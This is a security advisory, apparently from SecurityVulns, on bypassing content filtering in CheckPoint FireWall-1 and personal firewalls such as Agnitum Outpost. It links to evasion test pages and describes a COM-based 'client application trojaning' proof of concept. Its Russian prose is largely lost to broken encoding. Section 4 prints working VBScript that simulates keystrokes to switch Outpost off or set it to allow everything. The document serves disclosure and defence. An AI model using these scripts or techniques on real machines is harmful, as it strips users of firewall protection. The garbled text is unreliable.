Информационная безопасность
[RU] switch to English




:     
:  
 :
 CheckPoint   VPN-1(TM)   &   FireWall-1(R)   NG   with  Application
 Intelligence R55HFA09
 Microsoft Windows XP SP2
 Agnitum Outpost Pro 2.1.x  
 Tiny Firewall Pro v6.0.100  
 ZoneAlarm Pro with Web Filtering v4.5.594  
 BlackICE PC Protection 3.6  
 Kerio Personal Firewall 4.0
 WRQ ATGuard v3.2
:
 3APA3A, <[email protected]>, offtopic, <[email protected]>
           
   CheckPoint.      
 Checkpoint    ,   Agnitum    
 ""   .

  

</>
         -  
,                  
.       
            .  
       ,   
      .    ,     
 ,       ,
       .   
,    ,       
       .    , 
     .
<>
, Pedram?
< />

1. 

1.1       ?

           
.               
           ,
          OSI,        
  ,     
    DDoS  ...         
   .

  ,   ,   
,    ,       ,   5  .
  ,  ,      
  .            
  .
< />

              ?
            .    
                   
www.astalavista.com      .

<  ,  />

,             , 
        .       
  ,          
              
.           ,  
     Notepad.exe      
   .


 1.2        ?

         .  
            (
                )    
""        .    
      ,   ,
        ,   
    API.

          ,      
  ,      ,       
    .

 1.3      !    ?

        ,    .
  ,         Mozilla
,     $500      . 
Internet  Explorer           -   .
 - 500 ,  ,    
    .              
           .      
  .          , ,   
  .    ,   iDefense  
           .
    ,      .

<,  (),  />
</>

         ,   .
                .  
      freeware  , 
   .

<>

Full-disclosure? Who believe in it..

 , :

-         
 (,    -   ).
-              
.
-       .

        .        .  
          .
   ,        
  .

<    />
<         />

2.    -   
____________________________________________________________
 :         .
 :              
             ,    
 -                 
 .


 2.1  

         
   :  Checkpoint      
,

Agnitum  Outpost  Pro     . 
       VBScript  JavaScript 
 ActiveX.

           [1]         WEB-,
    Internet Explorer  ,  
  (   ,      ).

 2.2  :

  2.2.1 http://www.security.nnov.ru/files/opossum/test1.html
       (0x0B). [1].II.9
 
  2.2.2 http://www.security.nnov.ru/files/opossum/test2.html
      RFC2781 (UTF-16, little endian). [1].II.1

  2.2.3 http://www.security.nnov.ru/files/opossum/test3.html
      RFC2781 (UTF-16,  big endian). [1].II.1

  2.2.4 http://www.security.nnov.ru/files/opossum/test4.gif
       [1].II.13
  
  2.2.5 http://www.security.nnov.ru/files/opossum/test5.gif
   2.2.4      .

  2.2.6 http://www.security.nnov.ru/files/opossum/test6.html
       (0x00). [1].II.9

  2.2.7 http://www.security.nnov.ru/files/opossum/test7.asp
      UTF-7 (Content-Type) [1].II.2

  2.2.8 http://www.security.nnov.ru/files/opossum/test8.html
      (Meta http-equiv) [1].II.2

  2.2.9 http://www.security.nnov.ru/files/opossum/test9.html
       expression().  
  http-equiv  (malware.com).

  2.2.10. http://www.security.nnov.ru/files/opossum/test10.html
       [1].II.15
  
  2.2.11 http://www.security.nnov.ru/files/opossum/test11.mht
     MHTML (RFC2557)

       . Outpost     .  
  Checkpoint  2.2.2, 2.2.3, 2.2.6, 2.2.8, 2.2.9, 2.2.10, 2.2.11.

 2.3  :

        Checkpoint   Agnitum. Checkpoint  
          R55HFA10.   
          2.2.1    2.2.10. 
  2.2.11  Checkpoint     
(      ,    ,  ). 
R55HFA10         2.2.11  . Agnitum
  2.2.1    2.2.7    2.5.   
     .

            ,     
.

3.        
 ____________________________________________________________
 :   ,     

  ,         ,   
   .

      , 
,          .
          ,    
         .   
     .

         ,   
   (, )     .
        
  DLL, WriteProcessMemory(), CreateRemoteThread()  ..  ..
       [2]  [3].

                
      .  , 
        API.
          ,      
                 
,        (, HTTP 
)       . ..
        Proxy,      . 
,           
    .

        .      ,   ,  
      CAT  (Client  Application  Trojaning).  
      .

    http://www.security.nnov.ru/files/opossum/CAT.zip   
  ,     .  
COM         (Internet Explorer).
         
            ,    
      ,           
(Proxy-  ..).       
HTTP,     Microsoft.

      ,    
    .        
      -  mail.ru.     ,
      ,        (   
                  ?),      on-line     
http://translate.google.com/translate?hl=en&u=www.security.nnov.ru   
  ,   ...    
    .
  
   CAT PoC   :

  -      COM-  Internet  Explorer        
  www.mail.ru.
  -  CAT     ,    
      .
  - CAT    "ready"  .
  -  20  CAT   ""   
    XXX.request (XXX -  ).
  -          CAT   ,   
     .
  -       .

      IE.Visible = true     .

      100    VBS. 
,     .

<     ? />

   ILOVEYOU      ,        ,
,            
.     Windows Scripting Hosts  
        WMI,      
 "".

        CAT.
    Outpost  2.5,       COM
.          
  CAT    Outpost 2.5.    
  .

:        IE      
 IE .

4.    
____________________________________________________________
 :   ,   

  Outpost

       set WShell = CreateObject("WScript.Shell")

       WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
       WScript.Sleep 200
       WShell.AppActivate "Agnitum", TRUE
       WScript.Sleep 100
       WShell.SendKeys "{F10}{DOWN}{UP}{ENTER}"
       WScript.Sleep 100
       WShell.SendKeys "{ENTER}"

  Outpost  "" 

       set WShell = CreateObject("WScript.Shell")

       WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
       WScript.Sleep 100
       WShell.AppActivate "Agnitum", TRUE
       WScript.Sleep 10
       WShell.SendKeys "{F10}{LEFT}{LEFT}{LEFT}"
       WScript.Sleep 10
       WShell.SendKeys "{DOWN}{DOWN}{DOWN}{DOWN}{ENTER}"
       WScript.Sleep 10
       WShell.SendKeys "a{ENTER}"
       WScript.Sleep 10
       WShell.SendKeys "{F10}{LEFT}{DOWN}"
       WScript.Sleep 10
       WShell.SendKeys "n"

5. .
____________________________________________________________
 :     

         ,
      ,   "".
            
,    - GeSWall [4](    
  ).        ,   
          
.          
         , 
   .     - 
         
        [5].  ,    
 100% .


<   ,   (),
    ( ) />

6. :

[1] 3APA3A, Bypassing content filtering software
http://www.security.nnov.ru/advisories/content.asp
[2] Firewall leak tester
http://www.firewallleaktester.com/
[3] rattle, Using Process Infection to Bypass Windows Software Firewalls
http://www.phrack.org/show.php?p=62&a=13
[4] GeSWall (General Systems Wall)
http://www.securesize.com/
[5] offtopic, 3APA3A, "In front of front-end security"
http://www.linuxchile.cl/docs.php?op=ver&id=65

<WARNING:        \>
<WARNING:        \>


О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород